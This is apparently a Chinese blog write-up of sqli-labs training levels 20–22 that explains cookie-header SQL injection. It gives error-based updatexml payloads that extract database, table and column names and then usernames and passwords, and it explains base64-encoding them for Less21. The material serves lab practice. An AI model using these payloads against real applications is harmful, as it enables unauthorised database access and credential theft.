sqli-labs靶场less20~22

Less20

1.当我们输入的账号和密码都是dumb时会返回cookie信息,所以我们用cookie头部注入

2.首先查询数据库名

uname=' or updatexml(1,concat(1,database()),1)#

3.接下来判断表名

uname=' or updatexml(1,concat(1,( select group_concat(table_name) from information_schema.tables where table_schema = 'security')),1) #

4.下来判断列名

uname=' or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users')),1) #

5.接下来查具体数据

uname=' or updatexml(1,concat(1,(select group_concat(username,'~',password) from users)),1) #

Less21

1.我们来登录一下

2.我们看到里面有cookie,我们将内容解密一下,可以知道内容是dump,所以可以知道它与二十关的区别是加了一个加密,所以我们抓包之后加一个cookie头部字段,参数是uname,内容与上一关一样,只需要进行base64加密即可

3.按照这样的方法将20关的步骤再过一遍就行

Less22

1.我们拿dumb登录一下,可以看到这个界面与上一关一样,那我们就可以试一下闭合方式

2.我们试出来他的闭合方式为双引号

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值